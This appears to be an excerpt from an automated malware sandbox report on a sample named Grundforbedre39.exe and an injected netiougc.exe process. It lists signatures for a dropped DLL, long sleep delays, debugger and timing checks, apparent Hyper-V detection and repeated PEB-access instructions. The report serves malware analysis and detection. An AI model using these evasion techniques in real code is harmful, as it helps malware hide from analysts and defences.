        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 rdtsc 4_2_35551763
        Source: C:\Windows\SysWOW64\netiougc.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -110000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep count: 52 > 30Jump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -52000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -43500s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI call chain: ExitProcess graph end nodegraph_0-4538
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI call chain: ExitProcess graph end nodegraph_0-4541
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 rdtsc 4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00403863 GetTempPathW,GetUserDefaultUILanguage,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,LdrInitializeThunk,SystemParametersInfoW,LdrInitializeThunk,LdrInitializeThunk,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,0_2_00403863
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB55F mov eax, dword ptr fs:[00000030h]4_2_355EB55F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB55F mov eax, dword ptr fs:[00000030h]4_2_355EB55F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DA553 mov eax, dword ptr fs:[00000030h]4_2_355DA553
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35546540 mov eax, dword ptr fs:[00000030h]4_2_35546540
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35548540 mov eax, dword ptr fs:[00000030h]4_2_35548540
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E547 mov eax, dword ptr fs:[00000030h]4_2_3552E547
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551254C mov eax, dword ptr fs:[00000030h]4_2_3551254C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552C560 mov eax, dword ptr fs:[00000030h]4_2_3552C560
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C51D mov eax, dword ptr fs:[00000030h]4_2_3559C51D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35512500 mov eax, dword ptr fs:[00000030h]4_2_35512500
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B502 mov eax, dword ptr fs:[00000030h]4_2_3550B502
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C50D mov eax, dword ptr fs:[00000030h]4_2_3554C50D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C50D mov eax, dword ptr fs:[00000030h]4_2_3554C50D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513536 mov eax, dword ptr fs:[00000030h]4_2_35513536
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513536 mov eax, dword ptr fs:[00000030h]4_2_35513536
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552539 mov eax, dword ptr fs:[00000030h]4_2_35552539
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541527 mov eax, dword ptr fs:[00000030h]4_2_35541527
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355465D0 mov eax, dword ptr fs:[00000030h]4_2_355465D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C5FC mov eax, dword ptr fs:[00000030h]4_2_3559C5FC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A5E7 mov ebx, dword ptr fs:[00000030h]4_2_3554A5E7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A5E7 mov eax, dword ptr fs:[00000030h]4_2_3554A5E7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355415EF mov eax, dword ptr fs:[00000030h]4_2_355415EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35542594 mov eax, dword ptr fs:[00000030h]4_2_35542594
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E588 mov eax, dword ptr fs:[00000030h]4_2_3558E588
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E588 mov eax, dword ptr fs:[00000030h]4_2_3558E588
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A580 mov eax, dword ptr fs:[00000030h]4_2_3554A580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A580 mov eax, dword ptr fs:[00000030h]4_2_3554A580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35549580 mov eax, dword ptr fs:[00000030h]4_2_35549580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35549580 mov eax, dword ptr fs:[00000030h]4_2_35549580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF582 mov eax, dword ptr fs:[00000030h]4_2_355CF582
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355145B0 mov eax, dword ptr fs:[00000030h]4_2_355145B0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355145B0 mov eax, dword ptr fs:[00000030h]4_2_355145B0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355985AA mov eax, dword ptr fs:[00000030h]4_2_355985AA
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554D450 mov eax, dword ptr fs:[00000030h]4_2_3554D450
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554D450 mov eax, dword ptr fs:[00000030h]4_2_3554D450
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF478 mov eax, dword ptr fs:[00000030h]4_2_355CF478
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DA464 mov eax, dword ptr fs:[00000030h]4_2_355DA464
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF409 mov eax, dword ptr fs:[00000030h]4_2_355CF409
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A6400 mov eax, dword ptr fs:[00000030h]4_2_355A6400
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A6400 mov eax, dword ptr fs:[00000030h]4_2_355A6400
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550640D mov eax, dword ptr fs:[00000030h]4_2_3550640D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B420 mov eax, dword ptr fs:[00000030h]4_2_3550B420
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35599429 mov eax, dword ptr fs:[00000030h]4_2_35599429
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547425 mov eax, dword ptr fs:[00000030h]4_2_35547425
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547425 mov ecx, dword ptr fs:[00000030h]4_2_35547425
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355344D1 mov eax, dword ptr fs:[00000030h]4_2_355344D1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355344D1 mov eax, dword ptr fs:[00000030h]4_2_355344D1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF4FD mov eax, dword ptr fs:[00000030h]4_2_355CF4FD
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A4F0 mov eax, dword ptr fs:[00000030h]4_2_3554A4F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A4F0 mov eax, dword ptr fs:[00000030h]4_2_3554A4F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355394FA mov eax, dword ptr fs:[00000030h]4_2_355394FA
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355454E0 mov eax, dword ptr fs:[00000030h]4_2_355454E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4EF mov eax, dword ptr fs:[00000030h]4_2_3554E4EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4EF mov eax, dword ptr fs:[00000030h]4_2_3554E4EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554B490 mov eax, dword ptr fs:[00000030h]4_2_3554B490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554B490 mov eax, dword ptr fs:[00000030h]4_2_3554B490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C490 mov eax, dword ptr fs:[00000030h]4_2_3559C490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510485 mov ecx, dword ptr fs:[00000030h]4_2_35510485
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4BC mov eax, dword ptr fs:[00000030h]4_2_3554E4BC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355124A2 mov eax, dword ptr fs:[00000030h]4_2_355124A2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355124A2 mov ecx, dword ptr fs:[00000030h]4_2_355124A2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov ecx, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov eax, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov eax, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355444A8 mov eax, dword ptr fs:[00000030h]4_2_355444A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A750 mov eax, dword ptr fs:[00000030h]4_2_3554A750
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov ecx, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BE750 mov eax, dword ptr fs:[00000030h]4_2_355BE750
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35543740 mov eax, dword ptr fs:[00000030h]4_2_35543740
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554174A mov eax, dword ptr fs:[00000030h]4_2_3554174A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540774 mov eax, dword ptr fs:[00000030h]4_2_35540774
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514779 mov eax, dword ptr fs:[00000030h]4_2_35514779
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514779 mov eax, dword ptr fs:[00000030h]4_2_35514779
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551471B mov eax, dword ptr fs:[00000030h]4_2_3551471B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551471B mov eax, dword ptr fs:[00000030h]4_2_3551471B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF717 mov eax, dword ptr fs:[00000030h]4_2_355CF717
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D700 mov ecx, dword ptr fs:[00000030h]4_2_3551D700
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35539723 mov eax, dword ptr fs:[00000030h]4_2_35539723
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513722 mov eax, dword ptr fs:[00000030h]4_2_35513722
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513722 mov eax, dword ptr fs:[00000030h]4_2_35513722
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF7CF mov eax, dword ptr fs:[00000030h]4_2_355CF7CF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355177F9 mov eax, dword ptr fs:[00000030h]4_2_355177F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355177F9 mov eax, dword ptr fs:[00000030h]4_2_355177F9
